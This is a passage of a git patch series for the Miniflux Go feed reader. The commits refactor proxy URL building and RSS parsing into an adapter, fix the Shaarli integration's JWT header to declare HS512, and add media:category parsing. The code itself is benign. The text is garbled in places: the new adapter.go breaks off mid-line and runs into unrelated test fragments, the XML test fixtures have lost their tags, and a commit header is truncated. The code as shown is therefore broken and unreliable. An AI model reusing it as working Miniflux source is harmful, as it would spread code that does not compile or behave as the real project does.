proxyUrl.Path = path.Join(proxyUrl.Path, base64.URLEncoding.EncodeToString([]byte(link)))
return proxyUrl.String()
}
- return ""
+
+ mac := hmac.New(sha256.New, config.Opts.ProxyPrivateKey())
+ mac.Write([]byte(link))
+ digest := mac.Sum(nil)
+ return route.Path(router, "proxy", "encodedDigest", base64.URLEncoding.EncodeToString(digest), "encodedURL", base64.URLEncoding.EncodeToString([]byte(link)))
}
// AbsoluteProxifyURL generates an absolute URL for a proxified resource.
func AbsoluteProxifyURL(router *mux.Router, host, link string) string {
- if link != "" {
- proxyImageUrl := config.Opts.ProxyUrl()
+ proxifiedUrl := ProxifyURL(router, link)
- if proxyImageUrl == "" {
- mac := hmac.New(sha256.New, config.Opts.ProxyPrivateKey())
- mac.Write([]byte(link))
- digest := mac.Sum(nil)
- path := route.Path(router, "proxy", "encodedDigest", base64.URLEncoding.EncodeToString(digest), "encodedURL", base64.URLEncoding.EncodeToString([]byte(link)))
- if config.Opts.HTTPS {
- return "https://" + host + path
- } else {
- return "http://" + host + path
- }
- }
-
- proxyUrl, err := url.Parse(proxyImageUrl)
- if err != nil {
- return ""
- }
-
- proxyUrl.Path = path.Join(proxyUrl.Path, base64.URLEncoding.EncodeToString([]byte(link)))
- return proxyUrl.String()
+ if config.Opts.ProxyUrl() == "" {
+ return proxifiedUrl
}
- return ""
+ if config.Opts.HTTPS {
+ return "https://" + host + proxifiedUrl
+ }
+ return "http://" + host + proxifiedUrl
}
From 648b9a8f6f1e2aad032caed11df64f449ea157c1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Wed, 13 Mar 2024 21:06:28 -0700
Subject: [PATCH 10/80] Refactor RSS Parser to use an adapter
---
internal/reader/atom/atom_10.go | 2 +-
internal/reader/googleplay/googleplay.go | 2 +-
internal/reader/itunes/itunes.go | 4 +-
internal/reader/media/media.go | 11 +-
internal/reader/rdf/adapter.go | 5 +-
internal/reader/rss/adapter.go | 310 +++++++++++++++++
internal/reader/rss/feedburner.go | 4 +-
internal/reader/rss/parser.go | 6 +-
internal/reader/rss/parser_test.go | 107 ++++++
internal/reader/rss/podcast.go | 3 +-
internal/reader/rss/rss.go | 407 ++++-------------------
11 files changed, 497 insertions(+), 364 deletions(-)
create mode 100644 internal/reader/rss/adapter.go
diff --git a/internal/reader/atom/atom_10.go b/internal/reader/atom/atom_10.go
index 5b67e073..798a8748 100644
--- a/internal/reader/atom/atom_10.go
+++ b/internal/reader/atom/atom_10.go
@@ -91,7 +91,7 @@ type atom10Entry struct {
Content atom10Text `xml:"http://www.w3.org/2005/Atom content"`
Authors atomAuthors `xml:"author"`
Categories []atom10Category `xml:"category"`
- media.Element
+ media.MediaItemElement
}
func (a *atom10Entry) Transform() *model.Entry {
diff --git a/internal/reader/googleplay/googleplay.go b/internal/reader/googleplay/googleplay.go
index 38dcc71f..79404efb 100644
--- a/internal/reader/googleplay/googleplay.go
+++ b/internal/reader/googleplay/googleplay.go
@@ -6,7 +6,7 @@ package googleplay // import "miniflux.app/v2/internal/reader/googleplay"
// Specs:
// https://support.google.com/googleplay/podcasts/answer/6260341
// https://www.google.com/schemas/play-podcasts/1.0/play-podcasts.xsd
-type GooglePlayFeedElement struct {
+type GooglePlayChannelElement struct {
GooglePlayAuthor string `xml:"http://www.google.com/schemas/play-podcasts/1.0 author"`
GooglePlayEmail string `xml:"http://www.google.com/schemas/play-podcasts/1.0 email"`
GooglePlayImage GooglePlayImageElement `xml:"http://www.google.com/schemas/play-podcasts/1.0 image"`
diff --git a/internal/reader/itunes/itunes.go b/internal/reader/itunes/itunes.go
index 1673f306..87a02f0d 100644
--- a/internal/reader/itunes/itunes.go
+++ b/internal/reader/itunes/itunes.go
@@ -6,7 +6,7 @@ package itunes // import "miniflux.app/v2/internal/reader/itunes"
import "strings"
// Specs: https://help.apple.com/itc/podcasts_connect/#/itcb54353390
-type ItunesFeedElement struct {
+type ItunesChannelElement struct {
ItunesAuthor string `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd author"`
ItunesBlock string `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd block"`
ItunesCategories []ItunesCategoryElement `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd category"`
@@ -22,7 +22,7 @@ type ItunesFeedElement struct {
ItunesType string `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd type"`
}
-func (i *ItunesFeedElement) GetItunesCategories() []string {
+func (i *ItunesChannelElement) GetItunesCategories() []string {
var categories []string
for _, category := range i.ItunesCategories {
categories = append(categories, category.Text)
diff --git a/internal/reader/media/media.go b/internal/reader/media/media.go
index df84bf03..7fe4684d 100644
--- a/internal/reader/media/media.go
+++ b/internal/reader/media/media.go
@@ -11,9 +11,8 @@ import (
var textLinkRegex = regexp.MustCompile(`(?mi)(\bhttps?:\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])`)
-// Element represents XML media elements.
// Specs: https://www.rssboard.org/media-rss
-type Element struct {
+type MediaItemElement struct {
MediaGroups []Group `xml:"http://search.yahoo.com/mrss/ group"`
MediaContents []Content `xml:"http://search.yahoo.com/mrss/ content"`
MediaThumbnails []Thumbnail `xml:"http://search.yahoo.com/mrss/ thumbnail"`
@@ -22,7 +21,7 @@ type Element struct {
}
// AllMediaThumbnails returns all thumbnail elements merged together.
-func (e *Element) AllMediaThumbnails() []Thumbnail {
+func (e *MediaItemElement) AllMediaThumbnails() []Thumbnail {
var items []Thumbnail
items = append(items, e.MediaThumbnails...)
for _, mediaGroup := range e.MediaGroups {
@@ -32,7 +31,7 @@ func (e *Element) AllMediaThumbnails() []Thumbnail {
}
// AllMediaContents returns all content elements merged together.
-func (e *Element) AllMediaContents() []Content {
+func (e *MediaItemElement) AllMediaContents() []Content {
var items []Content
items = append(items, e.MediaContents...)
for _, mediaGroup := range e.MediaGroups {
@@ -42,7 +41,7 @@ func (e *Element) AllMediaContents() []Content {
}
// AllMediaPeerLinks returns all peer link elements merged together.
-func (e *Element) AllMediaPeerLinks() []PeerLink {
+func (e *MediaItemElement) AllMediaPeerLinks() []PeerLink {
var items []PeerLink
items = append(items, e.MediaPeerLinks...)
for _, mediaGroup := range e.MediaGroups {
@@ -52,7 +51,7 @@ func (e *Element) AllMediaPeerLinks() []PeerLink {
}
// FirstMediaDescription returns the first description element.
-func (e *Element) FirstMediaDescription() string {
+func (e *MediaItemElement) FirstMediaDescription() string {
description := e.MediaDescriptions.First()
if description != "" {
return description
diff --git a/internal/reader/rdf/adapter.go b/internal/reader/rdf/adapter.go
index 812badbc..bc8c76ed 100644
--- a/internal/reader/rdf/adapter.go
+++ b/internal/reader/rdf/adapter.go
@@ -28,15 +28,14 @@ func (r *RDFAdapter) BuildFeed(feedURL string) *model.Feed {
feed := &model.Feed{
Title: stripTags(r.rdf.Channel.Title),
FeedURL: feedURL,
+ SiteURL: r.rdf.Channel.Link,
}
if feed.Title == "" {
feed.Title = feedURL
}
- if siteURL, err := urllib.AbsoluteURL(feedURL, r.rdf.Channel.Link); err != nil {
- feed.SiteURL = r.rdf.Channel.Link
- } else {
+ if siteURL, err := urllib.AbsoluteURL(feedURL, r.rdf.Channel.Link); err == nil {
feed.SiteURL = siteURL
}
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
new file mode 100644
index 00000000..5c1785a9
--- /dev/null
+++ b/internal/reader/rss/adapter.go
@@ -0,0 +1,310 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package rss // import "miniflux.app/v2/internal/reader/rss"
+
+import (
+ "html"
+ "log/slog"
+ "path"
+ "strconv"
+ "strings"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type RSSAdapter struct {
+ rss *RSS
+}
+
+func NewRSSAdapter(rss *RSS) *RSSAdapter {
+ return &RSSAdapter{rss}
+}
+
+func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
+ feed := &model.Feed{
+ Title: html.UnescapeString(strings.TrimSpace(r.rss.Channel.Title)),
+ FeedURL: feedURL,
+ SiteURL: r.rss.Channel.Link,
+ }
+
+ if siteURL, err := urllib.AbsoluteURL(feedURL, r.rss.Channel.Link); err == nil {
+ feed.SiteURL = siteURL
+ }
+
+ // Try to find the feed URL from the Atom links.
+ for _, atomLink := range r.rss.Channel.AtomLinks.Links {
+ atomLinkHref := strings.TrimSpace(atomLink.URL)
+ if atomLinkHref != "" && atomLink.Rel == "self" {
+ if absoluteFeedURL, err := urllib.AbsoluteURL(feedURL, atomLinkHref); err == nil {
+ feed.FeedURL = absoluteFeedURL
+ break
+ }
+ }
+ }
+
+ // Fallback to the site URL if the title is empty.
+ if feed.Title == "" {
+ feed.Title = feed.SiteURL
+ }
+
+ // Get TTL if defined.
+ if r.rss.Channel.TTL != "" {
+ if ttl, err := strconv.Atoi(r.rss.Channel.TTL); err == nil {
+ feed.TTL = ttl
+ }
+ }
+
+ // Get the feed icon URL if defined.
+ if r.rss.Channel.Image != nil {
+ if absoluteIconURL, err := urllib.AbsoluteURL(feed.SiteURL, r.rss.Channel.Image.URL); err == nil {
+ feed.IconURL = absoluteIconURL
+ }
+ }
+
+ for _, item := range r.rss.Channel.Items {
+ entry := model.NewEntry()
+ entry.Author = findEntryAuthor(&item)
+ entry.Date = findEntryDate(&item)
+ entry.Content = findEntryContent(&item)
+ entry.Enclosures = findEntryEnclosures(&item)
+
+ // Populate the entry URL.
+ entryURL := findEntryURL(&item)
+ if entryURL == "" {
+ entry.URL = feed.SiteURL
+ } else {
+ if absoluteEntryURL, err := urllib.AbsoluteURL(feed.SiteURL, entryURL); err == nil {
+ entry.URL = absoluteEntryURL
+ } else {
+ entry.URL = entryURL
+ }
+ }
+
+ // Populate the entry title.
+ entry.Title = findEntryTitle(&item)
+ if entry.Title == "" {
+ entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
+ }
+
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ if entry.Author == "" {
+ entry.Author = findFeedAuthor(&r.rss.Channel)
+ }
+
+ // Generate the entry hash.
+ for _, value := range []string{item.GUID.Data, entryURL} {
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ // Find CommentsURL if defined.
+ if absoluteCommentsURL := strings.TrimSpace(item.CommentsURL); absoluteCommentsURL != "" && urllib.IsAbsoluteURL(absoluteCommentsURL) {
+ entry.CommentsURL = absoluteCommentsURL
+ }
+
+ // Set podcast listening time.
+ if item.ItunesDuration != "" {
+ if duration, err := getDurationInMinutes(item.ItunesDuration); err == nil {
+ entry.ReadingTime = duration
+ }
+ }
+
+ // Populate entry categories.
+ entry.Tags = append(entry.Tags, item.Categories...)
+ entry.Tags = append(entry.Tags, r.rss.Channel.Categories...)
+ entry.Tags = append(entry.Tags, r.rss.Channel.GetItunesCategories()...)
+
+ if r.rss.Channel.GooglePlayCategory.Text != "" {
+ entry.Tags = append(entry.Tags, r.rss.Channel.GooglePlayCategory.Text)
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
+
+func findFeedAuthor(rssChannel *RSSChannel) string {
+ var author string
+ switch {
+ case rssChannel.ItunesAuthor != "":
+ author = rssChannel.ItunesAuthor
+ case rssChannel.GooglePlayAuthor != "":
+ author = rssChannel.GooglePlayAuthor
+ case rssChannel.ItunesOwner.String() != "":
+ author = rssChannel.ItunesOwner.String()
+ case rssChannel.ManagingEditor != "":
+ author = rssChannel.ManagingEditor
+ case rssChannel.Webmaster != "":
+ author = rssChannel.Webmaster
+ }
+ return sanitizer.StripTags(strings.TrimSpace(author))
+}
+
+func findEntryTitle(rssItem *RSSItem) string {
+ title := rssItem.Title
+
+ if rssItem.DublinCoreTitle != "" {
+ title = rssItem.DublinCoreTitle
+ }
+
+ return html.UnescapeString(strings.TrimSpace(title))
+}
+
+func findEntryURL(rssItem *RSSItem) string {
+ for _, link := range []string{rssItem.FeedBurnerLink, rssItem.Link} {
+ if link != "" {
+ return strings.TrimSpace(link)
+ }
+ }
+
+ for _, atomLink := range rssItem.AtomLinks.Links {
+ if atomLink.URL != "" && (strings.EqualFold(atomLink.Rel, "alternate") || atomLink.Rel == "") {
+ return strings.TrimSpace(atomLink.URL)
+ }
+ }
+
+ // Specs: https://cyber.harvard.edu/rss/rss.html#ltguidgtSubelementOfLtitemgt
+ // isPermaLink is optional, its default value is true.
+ // If its value is false, the guid may not be assumed to be a url, or a url to anything in particular.
+ if rssItem.GUID.IsPermaLink == "true" || rssItem.GUID.IsPermaLink == "" {
+ return strings.TrimSpace(rssItem.GUID.Data)
+ }
+
+ return ""
+}
+
+func findEntryContent(rssItem *RSSItem) string {
+ for _, value := range []string{
+ rssItem.DublinCoreContent,
+ rssItem.Description,
+ rssItem.GooglePlayDescription,
+ rssItem.ItunesSummary,
+ rssItem.ItunesSubtitle,
+ } {
+ if value != "" {
+ return value
+ }
+ }
+ return ""
+}
+
+func findEntryDate(rssItem *RSSItem) time.Time {
+ value := rssItem.PubDate
+ if rssItem.DublinCoreDate != "" {
+ value = rssItem.DublinCoreDate
+ }
+
+ if value != "" {
+ result, err := date.Parse(value)
+ if err != nil {
+ slog.Debug("Unable to parse date from RSS feed",
+ slog.String("date", value),
+ slog.String("guid", rssItem.GUID.Data),
+ slog.Any("error", err),
+ )
+ return time.Now()
+ }
+
+ return result
+ }
+
+ return time.Now()
+}
+
+func findEntryAuthor(rssItem *RSSItem) string {
+ var author string
+
+ switch {
+ case rssItem.GooglePlayAuthor != "":
+ author = rssItem.GooglePlayAuthor
+ case rssItem.ItunesAuthor != "":
+ author = rssItem.ItunesAuthor
+ case rssItem.DublinCoreCreator != "":
+ author = rssItem.DublinCoreCreator
+ case rssItem.AtomAuthor.String() != "":
+ author = rssItem.AtomAuthor.String()
+ case strings.Contains(rssItem.Author.Inner, "
+
+
+ My Podcast Feed
+ http://example.org
+ some.email@example.org
+
+ Podcasting with RSS
+ http://www.example.org/entries/1
+ An overview of RSS podcasting
+ Fri, 15 Jul 2005 00:00:00 -0500
+ http://www.example.org/entries/1
+
+
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ if feed.Entries[0].URL != "http://www.example.org/entries/1" {
+ t.Errorf("Incorrect entry URL, got: %s", feed.Entries[0].URL)
+ }
+
+ if len(feed.Entries[0].Enclosures) != 2 {
+ t.Errorf("Incorrect number of enclosures, got: %d", len(feed.Entries[0].Enclosures))
+ }
+
+ if feed.Entries[0].Enclosures[0].URL != "http://www.example.org/myaudiofile.mp3" {
+ t.Errorf("Incorrect enclosure URL, got: %s", feed.Entries[0].Enclosures[0].URL)
+ }
+
+ if feed.Entries[0].Enclosures[0].MimeType != "audio/mpeg" {
+ t.Errorf("Incorrect enclosure type, got: %s", feed.Entries[0].Enclosures[0].MimeType)
+ }
+
+ if feed.Entries[0].Enclosures[0].Size != 0 {
+ t.Errorf("Incorrect enclosure length, got: %d", feed.Entries[0].Enclosures[0].Size)
+ }
+
+ if feed.Entries[0].Enclosures[1].Size != 0 {
+ t.Errorf("Incorrect enclosure length, got: %d", feed.Entries[0].Enclosures[0].Size)
+ }
+}
+
func TestParseEntryWithEmptyEnclosureURL(t *testing.T) {
data := `
@@ -1306,6 +1359,60 @@ func TestParseEntryWithMediaPeerLink(t *testing.T) {
}
}
+func TestParseItunesDuration(t *testing.T) {
+ data := `
+
+
+ Podcast Example
+ http://www.example.com/index.html
+
+ Podcast Episode
+ http://example.com/episode.m4a
+ Tue, 08 Mar 2016 12:00:00 GMT
+ 1:23:45
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ expected := 83
+ result := feed.Entries[0].ReadingTime
+ if expected != result {
+ t.Errorf(`Unexpected podcast duration, got %d instead of %d`, result, expected)
+ }
+}
+
+func TestParseIncorrectItunesDuration(t *testing.T) {
+ data := `
+
+
+ Podcast Example
+ http://www.example.com/index.html
+
+ Podcast Episode
+ http://example.com/episode.m4a
+ Tue, 08 Mar 2016 12:00:00 GMT
+ invalid
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ expected := 0
+ result := feed.Entries[0].ReadingTime
+ if expected != result {
+ t.Errorf(`Unexpected podcast duration, got %d instead of %d`, result, expected)
+ }
+}
+
func TestEntryDescriptionFromItunesSummary(t *testing.T) {
data := `
diff --git a/internal/reader/rss/podcast.go b/internal/reader/rss/podcast.go
index 9a1f365b..7fd93f4a 100644
--- a/internal/reader/rss/podcast.go
+++ b/internal/reader/rss/podcast.go
@@ -12,8 +12,7 @@ import (
var ErrInvalidDurationFormat = errors.New("rss: invalid duration format")
-// normalizeDuration returns the duration tag value as a number of minutes
-func normalizeDuration(rawDuration string) (int, error) {
+func getDurationInMinutes(rawDuration string) (int, error) {
var sumSeconds int
durationParts := strings.Split(rawDuration, ":")
diff --git a/internal/reader/rss/rss.go b/internal/reader/rss/rss.go
index be53c4b0..7935166d 100644
--- a/internal/reader/rss/rss.go
+++ b/internal/reader/rss/rss.go
@@ -5,391 +5,110 @@ package rss // import "miniflux.app/v2/internal/reader/rss"
import (
"encoding/xml"
- "html"
- "log/slog"
- "path"
"strconv"
"strings"
- "time"
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
"miniflux.app/v2/internal/reader/dublincore"
"miniflux.app/v2/internal/reader/googleplay"
"miniflux.app/v2/internal/reader/itunes"
"miniflux.app/v2/internal/reader/media"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
// Specs: https://www.rssboard.org/rss-specification
-type rssFeed struct {
- XMLName xml.Name `xml:"rss"`
+type RSS struct {
Version string `xml:"rss version,attr"`
- Channel rssChannel `xml:"rss channel"`
+ Channel RSSChannel `xml:"rss channel"`
}
-type rssChannel struct {
- Categories []string `xml:"rss category"`
+type RSSChannel struct {
Title string `xml:"rss title"`
Link string `xml:"rss link"`
- ImageURL string `xml:"rss image>url"`
- Language string `xml:"rss language"`
Description string `xml:"rss description"`
- PubDate string `xml:"rss pubDate"`
+ Language string `xml:"rss language"`
+ Copyright string `xml:"rss copyRight"`
ManagingEditor string `xml:"rss managingEditor"`
Webmaster string `xml:"rss webMaster"`
- TimeToLive rssTTL `xml:"rss ttl"`
- Items []rssItem `xml:"rss item"`
+ PubDate string `xml:"rss pubDate"`
+ LastBuildDate string `xml:"rss lastBuildDate"`
+ Categories []string `xml:"rss category"`
+ Generator string `xml:"rss generator"`
+ Docs string `xml:"rss docs"`
+ Cloud *RSSCloud `xml:"rss cloud"`
+ Image *RSSImage `xml:"rss image"`
+ TTL string `xml:"rss ttl"`
+ SkipHours []string `xml:"rss skipHours>hour"`
+ SkipDays []string `xml:"rss skipDays>day"`
+ Items []RSSItem `xml:"rss item"`
AtomLinks
- itunes.ItunesFeedElement
- googleplay.GooglePlayFeedElement
+ itunes.ItunesChannelElement
+ googleplay.GooglePlayChannelElement
}
-type rssTTL struct {
- Data string `xml:",chardata"`
+type RSSCloud struct {
+ Domain string `xml:"domain,attr"`
+ Port string `xml:"port,attr"`
+ Path string `xml:"path,attr"`
+ RegisterProcedure string `xml:"registerProcedure,attr"`
+ Protocol string `xml:"protocol,attr"`
}
-func (r *rssTTL) Value() int {
- if r.Data == "" {
- return 0
- }
+type RSSImage struct {
+ // URL is the URL of a GIF, JPEG or PNG image that represents the channel.
+ URL string `xml:"url"`
- value, err := strconv.Atoi(r.Data)
- if err != nil {
- return 0
- }
+ // Title describes the image; it's used in the ALT attribute of the HTML <img> tag when the channel is rendered in HTML.
+ Title string `xml:"title"`
- return value
+ // Link is the URL of the site; when the channel is rendered, the image is a link to the site.
+ Link string `xml:"link"`
}
-func (r *rssFeed) Transform(baseURL string) *model.Feed {
- var err error
-
- feed := new(model.Feed)
-
- siteURL := r.siteURL()
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, siteURL)
- if err != nil {
- feed.SiteURL = siteURL
- }
-
- feedURL := r.feedURL()
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, feedURL)
- if err != nil {
- feed.FeedURL = feedURL
- }
-
- feed.Title = html.UnescapeString(strings.TrimSpace(r.Channel.Title))
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
-
- feed.IconURL = strings.TrimSpace(r.Channel.ImageURL)
- feed.TTL = r.Channel.TimeToLive.Value()
-
- for _, item := range r.Channel.Items {
- entry := item.Transform()
- if entry.Author == "" {
- entry.Author = r.feedAuthor()
- }
-
- if entry.URL == "" {
- entry.URL = feed.SiteURL
- } else {
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL)
- if err == nil {
- entry.URL = entryURL
- }
- }
-
- if entry.Title == "" {
- entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
- }
-
- if entry.Title == "" {
- entry.Title = entry.URL
- }
-
- entry.Tags = append(entry.Tags, r.Channel.Categories...)
- entry.Tags = append(entry.Tags, r.Channel.GetItunesCategories()...)
-
- if r.Channel.GooglePlayCategory.Text != "" {
- entry.Tags = append(entry.Tags, r.Channel.GooglePlayCategory.Text)
- }
-
- feed.Entries = append(feed.Entries, entry)
- }
-
- return feed
-}
-
-func (r *rssFeed) siteURL() string {
- return strings.TrimSpace(r.Channel.Link)
-}
-
-func (r *rssFeed) feedURL() string {
- for _, atomLink := range r.Channel.AtomLinks.Links {
- if atomLink.Rel == "self" {
- return strings.TrimSpace(atomLink.URL)
- }
- }
- return ""
-}
-
-func (r rssFeed) feedAuthor() string {
- var author string
- switch {
- case r.Channel.ItunesAuthor != "":
- author = r.Channel.ItunesAuthor
- case r.Channel.GooglePlayAuthor != "":
- author = r.Channel.GooglePlayAuthor
- case r.Channel.ItunesOwner.String() != "":
- author = r.Channel.ItunesOwner.String()
- case r.Channel.ManagingEditor != "":
- author = r.Channel.ManagingEditor
- case r.Channel.Webmaster != "":
- author = r.Channel.Webmaster
- }
- return sanitizer.StripTags(strings.TrimSpace(author))
-}
-
-type rssGUID struct {
- XMLName xml.Name
- Data string `xml:",chardata"`
- IsPermaLink string `xml:"isPermaLink,attr"`
-}
-
-type rssAuthor struct {
- XMLName xml.Name
- Data string `xml:",chardata"`
- Inner string `xml:",innerxml"`
-}
-
-type rssEnclosure struct {
- URL string `xml:"url,attr"`
- Type string `xml:"type,attr"`
- Length string `xml:"length,attr"`
-}
-
-func (enclosure *rssEnclosure) Size() int64 {
- if enclosure.Length == "" {
- return 0
- }
- size, _ := strconv.ParseInt(enclosure.Length, 10, 0)
- return size
-}
-
-type rssItem struct {
- GUID rssGUID `xml:"rss guid"`
- Title string `xml:"rss title"`
- Link string `xml:"rss link"`
- Description string `xml:"rss description"`
- PubDate string `xml:"rss pubDate"`
- Author rssAuthor `xml:"rss author"`
- Comments string `xml:"rss comments"`
- EnclosureLinks []rssEnclosure `xml:"rss enclosure"`
- Categories []string `xml:"rss category"`
+type RSSItem struct {
+ Title string `xml:"rss title"`
+ Link string `xml:"rss link"`
+ Description string `xml:"rss description"`
+ Author RSSAuthor `xml:"rss author"`
+ Categories []string `xml:"rss category"`
+ CommentsURL string `xml:"rss comments"`
+ Enclosures []RSSEnclosure `xml:"rss enclosure"`
+ GUID RSSGUID `xml:"rss guid"`
+ PubDate string `xml:"rss pubDate"`
+ Source RSSSource `xml:"rss source"`
dublincore.DublinCoreItemElement
- FeedBurnerElement
- media.Element
+ FeedBurnerItemElement
+ media.MediaItemElement
AtomAuthor
AtomLinks
itunes.ItunesItemElement
googleplay.GooglePlayItemElement
}
-func (r *rssItem) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = r.entryURL()
- entry.CommentsURL = r.entryCommentsURL()
- entry.Date = r.entryDate()
- entry.Author = r.entryAuthor()
- entry.Hash = r.entryHash()
- entry.Content = r.entryContent()
- entry.Title = r.entryTitle()
- entry.Enclosures = r.entryEnclosures()
- entry.Tags = r.Categories
- if duration, err := normalizeDuration(r.ItunesDuration); err == nil {
- entry.ReadingTime = duration
- }
-
- return entry
+type RSSAuthor struct {
+ XMLName xml.Name
+ Data string `xml:",chardata"`
+ Inner string `xml:",innerxml"`
}
-func (r *rssItem) entryDate() time.Time {
- value := r.PubDate
- if r.DublinCoreDate != "" {
- value = r.DublinCoreDate
- }
-
- if value != "" {
- result, err := date.Parse(value)
- if err != nil {
- slog.Debug("Unable to parse date from RSS feed",
- slog.String("date", value),
- slog.String("guid", r.GUID.Data),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
+type RSSEnclosure struct {
+ URL string `xml:"url,attr"`
+ Type string `xml:"type,attr"`
+ Length string `xml:"length,attr"`
}
-func (r *rssItem) entryAuthor() string {
- var author string
-
- switch {
- case r.GooglePlayAuthor != "":
- author = r.GooglePlayAuthor
- case r.ItunesAuthor != "":
- author = r.ItunesAuthor
- case r.DublinCoreCreator != "":
- author = r.DublinCoreCreator
- case r.AtomAuthor.String() != "":
- author = r.AtomAuthor.String()
- case strings.Contains(r.Author.Inner, "
Date: Wed, 13 Mar 2024 23:29:07 +0100
Subject: [PATCH 11/80] Fix and simplify shaarli's integration
- The jwt token was declared as using HS256 as algorithm, but was using HS512.
- No need to base64-encode then remove the padding when we can simply encode
without padding.
- Factorize the header+payload concatenation as data
Odds are that this integration was broken from the start (HS512 vs HS256), so
I'm not sure if it's better to add tests or to simply get rid of it.
---
internal/integration/shaarli/shaarli.go | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/internal/integration/shaarli/shaarli.go b/internal/integration/shaarli/shaarli.go
index a69da227..aeb701e8 100644
--- a/internal/integration/shaarli/shaarli.go
+++ b/internal/integration/shaarli/shaarli.go
@@ -11,7 +11,6 @@ import (
"encoding/json"
"fmt"
"net/http"
- "strings"
"time"
"miniflux.app/v2/internal/urllib"
@@ -74,14 +73,15 @@ func (c *Client) CreateLink(entryURL, entryTitle string) error {
}
func (c *Client) generateBearerToken() string {
- header := strings.TrimRight(base64.URLEncoding.EncodeToString([]byte(`{"typ":"JWT", "alg":"HS256"}`)), "=")
- payload := strings.TrimRight(base64.URLEncoding.EncodeToString([]byte(fmt.Sprintf(`{"iat": %d}`, time.Now().Unix()))), "=")
+ header := base64.RawURLEncoding.EncodeToString([]byte(`{"typ":"JWT","alg":"HS512"}`))
+ payload := base64.RawURLEncoding.EncodeToString([]byte(fmt.Sprintf(`{"iat":%d}`, time.Now().Unix())))
+ data := header + "." + payload
mac := hmac.New(sha512.New, []byte(c.apiSecret))
- mac.Write([]byte(header + "." + payload))
- signature := strings.TrimRight(base64.URLEncoding.EncodeToString(mac.Sum(nil)), "=")
+ mac.Write([]byte(data))
+ signature := base64.RawURLEncoding.EncodeToString(mac.Sum(nil))
- return header + "." + payload + "." + signature
+ return data + "." + signature
}
type addLinkRequest struct {
From 5948786b158f5c16bc2cd05d2e238546b93f5b48 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Wed, 13 Mar 2024 21:26:39 -0700
Subject: [PATCH 12/80] Add support for RSS <media:category> element
---
internal/reader/media/media.go | 28 ++++++++++++++++++-----
internal/reader/rss/adapter.go | 1 +
internal/reader/rss/parser_test.go | 36 ++++++++++++++++++++++++++++++
3 files changed, 60 insertions(+), 5 deletions(-)
diff --git a/internal/reader/media/media.go b/internal/reader/media/media.go
index 7fe4684d..a4b7d8af 100644
--- a/internal/reader/media/media.go
+++ b/internal/reader/media/media.go
@@ -13,11 +13,12 @@ var textLinkRegex = regexp.MustCompile(`(?mi)(\bhttps?:\/\/[-A-Z0-9+&@#\/%?=~_|!
// Specs: https://www.rssboard.org/media-rss
type MediaItemElement struct {
- MediaGroups []Group `xml:"http://search.yahoo.com/mrss/ group"`
- MediaContents []Content `xml:"http://search.yahoo.com/mrss/ content"`
- MediaThumbnails []Thumbnail `xml:"http://search.yahoo.com/mrss/ thumbnail"`
- MediaDescriptions DescriptionList `xml:"http://search.yahoo.com/mrss/ description"`
- MediaPeerLinks []PeerLink `xml:"http://search.yahoo.com/mrss/ peerLink"`
+ MediaCategories MediaCategoryList `xml:"http://search.yahoo.com/mrss/ category"`
+ MediaGroups []Group `xml:"http://search.yahoo.com/mrss/ group"`
+ MediaContents []Content `xml:"http://search.yahoo.com/mrss/ content"`
+ MediaThumbnails []Thumbnail `xml:"http://search.yahoo.com/mrss/ thumbnail"`
+ MediaDescriptions DescriptionList `xml:"http://search.yahoo.com/mrss/ description"`
+ MediaPeerLinks []PeerLink `xml:"http://search.yahoo.com/mrss/ peerLink"`
}
// AllMediaThumbnails returns all thumbnail elements merged together.
@@ -173,3 +174,20 @@ func (dl DescriptionList) First() string {
}
return ""
}
+
+type MediaCategoryList []MediaCategory
+
+func (mcl MediaCategoryList) Labels() []string {
+ var labels []string
+ for _, category := range mcl {
+ label := strings.TrimSpace(category.Label)
+ if label != "" {
+ labels = append(labels, label)
+ }
+ }
+ return labels
+}
+
+type MediaCategory struct {
+ Label string `xml:"label,attr"`
+}
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
index 5c1785a9..fe1eed80 100644
